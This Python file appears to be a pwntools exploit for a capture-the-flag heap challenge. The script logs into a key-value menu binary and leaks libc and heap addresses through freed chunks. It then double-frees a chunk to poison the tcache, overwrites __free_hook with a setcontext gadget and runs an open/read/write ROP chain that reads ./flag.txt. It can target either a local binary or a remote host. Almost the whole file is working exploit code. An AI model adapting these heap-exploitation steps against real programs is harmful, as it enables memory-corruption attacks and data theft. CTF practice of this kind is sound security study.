from pwn import *

# Tube/tooling configuration. log_level='debug' makes pwntools print every
# byte sent and received, so the full interaction is visible in the log.
context(os='linux', arch='amd64', log_level='debug')
context.terminal = ['tmux', 'sp', '-h']

local = 1  # truthy: run ./pwn locally; otherwise connect to the remote service below
elf = ELF('./pwn')
if local:
    p = process('./pwn')
    libc = ELF('./libc.so.6')
else:
    p = remote('0192d6496a03783395106845917ed538.gqlw.dg06.ciihw.cn',43668)
    libc = ELF('./libc.so.6')
# Short aliases for the tube operations on the global tube ``p``.
def sd(s):
    """Send ``s`` as-is."""
    return p.send(s)


def sl(s):
    """Send ``s`` followed by a newline."""
    return p.sendline(s)


def sa(n, s):
    """Wait for ``n`` to be received, then send ``s``."""
    return p.sendafter(n, s)


def sla(n, s):
    """Wait for ``n`` to be received, then send ``s`` plus a newline."""
    return p.sendlineafter(n, s)


def rc(n):
    """Receive up to ``n`` bytes."""
    return p.recv(n)


def rl():
    """Receive one line."""
    return p.recvline()


def ru(s):
    """Receive until ``s`` has been seen."""
    return p.recvuntil(s)


def ra():
    """Receive everything until the tube closes."""
    return p.recvall()


def ia():
    """Hand the tube over to the user."""
    return p.interactive()


def uu32(data):
    """Unpack ``data`` as a 32-bit word after zero-padding it to 4 bytes."""
    return u32(data.ljust(4, b'\x00'))


def uu64(data):
    """Unpack ``data`` as a 64-bit word after zero-padding it to 8 bytes."""
    return u64(data.ljust(8, b'\x00'))
def lg(s):
    """Log the value named by the string ``s`` in hex through ``success``.

    NOTE(review): ``eval`` executes ``s`` as Python in this module's scope;
    it is only ever called here with literal variable names.
    """
    value = eval(s)
    success("%s >> 0x%x" % (s, value))
def bk(addr):
    """Attach gdb to ``p`` with one breakpoint at the absolute address ``addr``."""
    breakpoint_cmd = "b *" + hex(addr)
    gdb.attach(p, breakpoint_cmd)
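def debug(addr, PIE=True):
    """Attach gdb to the running tube ``p`` with a single breakpoint.

    Args:
        addr: Breakpoint address. When ``PIE`` is true it is treated as an
            offset from the first mapping reported by ``pmap``; otherwise it
            is used as an absolute address.
        PIE: Whether to rebase ``addr`` on the process' first mapping.
    """
    if not PIE:
        gdb.attach(p, "b *{}".format(hex(addr)))
        return
    # Run pmap with an argv list (no shell string) and read its whole output,
    # so the pipe is closed; the earlier os.popen(...) pipeline was never
    # closed. The second output line is the first mapping and its first
    # field is the start address, which is what `awk '{print $1}'` selected.
    import subprocess
    pmap_out = subprocess.run(
        ["pmap", str(p.pid)],
        stdout=subprocess.PIPE,
        universal_newlines=True,
    ).stdout
    text_base = int(pmap_out.splitlines()[1].split()[0], 16)
    gdb.attach(p, "b *{}".format(hex(text_base + addr)))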
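def rc4(data, key=b's4cur1ty_p4ssw0rd'):
    """Apply the RC4 stream cipher to ``data`` and return the result as a bytearray.

    RC4 is symmetric: applying it twice with the same key restores the input.
    The default key is the value that was previously hard-coded inside the
    function; it is exposed as a parameter so the routine is reusable and
    testable. RC4 is a deprecated cipher with known keystream biases
    (RFC 7465) and the key is embedded in this script, so this only
    reproduces a transformation, it does not protect anything.

    Args:
        data: Bytes-like input; each element must be an int in 0..255.
        key: Non-empty bytes-like key.

    Returns:
        bytearray of the same length as ``data``.

    Raises:
        ValueError: if ``key`` is empty (``i % len(key)`` would otherwise
            raise ZeroDivisionError).
    """
    if not key:
        raise ValueError("rc4 key must be non-empty")

    # Key scheduling (KSA): permute the 256-entry state using the key.
    S = list(range(256))
    j = 0
    key_len = len(key)
    for i in range(256):
        j = (j + S[i] + key[i % key_len]) % 256
        S[i], S[j] = S[j], S[i]  # swap

    # Pseudo-random generation (PRGA): one keystream byte per input byte,
    # XORed into the output.
    i = j = 0
    output = bytearray()
    for byte in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]  # swap
        output.append(byte ^ S[(S[i] + S[j]) % 256])
    return output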
def cmd(op):
    """Select menu entry ``op`` once the ``> `` prompt has arrived."""
    choice = str(op)
    sla("> ", choice)
def add(index, size, content):
    """Menu option 1: store ``content`` with declared size ``size`` under key ``index``."""
    cmd(1)
    answers = (
        ("Input the key: ", str(index)),
        ("Input the value size: ", str(size)),
        ("Input the value: ", content),
    )
    for prompt, answer in answers:
        sla(prompt, answer)
def show(index):
    """Menu option 2: ask the program to print the value stored under key ``index``."""
    cmd(2)
    key = str(index)
    sla("Input the key: ", key)
def free(index):
    """Menu option 3: release the entry stored under key ``index``."""
    cmd(3)
    key = str(index)
    sla("Input the key: ", key)
def edit(index, content):
    """Menu option 4: replace the value stored under key ``index`` with ``content``."""
    cmd(4)
    answers = (
        ("Input the key: ", str(index)),
        ("Input the value: ", content),
    )
    for prompt, answer in answers:
        sla(prompt, answer)
# Log in with the credentials hard-coded here.
sa("Input your username:",'4dm1n\n')
sa("Input your password:",'985da4f8cb37zkj\n')

# Create 12 entries (keys 0..11, 0xf0 bytes each), then free keys 9 down to 0.
for i in range(12):
    add(i,0xf0,'a'*8)
for i in range(10):
    free(9-i)

# Read back key 0. The 6 bytes received are XORed with 0xa4b3e366e833 (the
# low 48 bits of the constant in the trailing comment) and rebased by a
# fixed offset to give libc_base.
show(0)
ru("The result is:\n\t[key,value] = [0,")
libc_base = (uu64(rc(6)[-6:]) ^ 0xa4b3e366e833) - 0x3ebca0 # 2e50a4b3e366e833
lg('libc_base')

# Same procedure on key 4, with a different offset, to give heap_base.
show(4)
ru("The result is:\n\t[key,value] = [4,")
heap_base = (uu64(rc(6)[-6:]) ^ 0xa4b3e366e833) - 0x1b70 # 2e50a4b3e366e833
lg('heap_base')

# Addresses derived from the two bases: gadgets located by byte-searching
# ./libc.so.6, exported libc symbols, and one raw offset (set_context) that
# is presumably specific to the bundled libc.so.6 — it will not hold for a
# different build.
flag_addr = heap_base + 0x1b70
rop_addr = flag_addr + 16 + 0x100
pop_rbp = libc_base + next(libc.search(asm('pop rbp;ret;')))
leave_ret = libc_base + next(libc.search(asm('leave;ret;')))
ret = libc_base + next(libc.search(asm('ret;')))
pop_rdi = libc_base + next(libc.search(asm('pop rdi;ret;')))
pop_rsi = libc_base + next(libc.search(asm('pop rsi;ret;')))
pop_rdx = libc_base + next(libc.search(asm('pop rdx;ret;')))
pop_rax = libc_base + next(libc.search(asm('pop rax;ret;')))
syscall_ret = libc_base + next(libc.search(asm('syscall\nret')))
stdout_addr = libc_base + libc.sym['_IO_2_1_stdout_']
stderr_addr = libc_base + libc.sym['_IO_2_1_stderr_']
libc_write = libc_base + libc.sym['write']
libc_read = libc_base + libc.sym['read']
free_hook = libc_base + libc.sym['__free_hook']
set_context = libc_base + 0x52085

# Re-create keys 0, 1 and 2.
add(0,0xf0,'a'*8)
add(1,0xf0,'a'*8)
add(2,0xf0,'a'*8)

# Value stored under key 11: the file name './flag.txt', then a sequence of
# gadget/argument words, padded with 'a' to 0xa0 bytes and followed by
# rop_addr and ret.
payload = b'./flag.txt\x00\x00\x00\x00\x00\x00'
payload+= p64(pop_rdi) + p64(flag_addr) + p64(pop_rsi) + p64(0) + p64(pop_rax) + p64(2) + p64(syscall_ret)
payload+= p64(pop_rdi) + p64(3) + p64(pop_rsi) + p64(flag_addr) + p64(pop_rdx) + p64(0x50) + p64(libc_read)
payload+= p64(pop_rdi) + p64(1) + p64(libc_write)
payload = payload.ljust(0xa0, b'a')
payload += p64(rop_addr)
payload += p64(ret)

add(11,0xf0,payload)

# Key 2 is freed, then key 1, then key 2 again (a second free of key 2).
free(2)
free(1)
free(2)

# Overwrite the released key 2 with free_hook XORed by the same constant.
edit(2,p64(free_hook^0x2e50a4b3e366e833))

# Two further allocations under key 0: the RC4-transformed payload, then
# set_context XORed by the same constant.
add(0,0xf0,rc4(payload))
add(0,0xf0,p64(set_context^0x2e50a4b3e366e833))

free(11)

ia()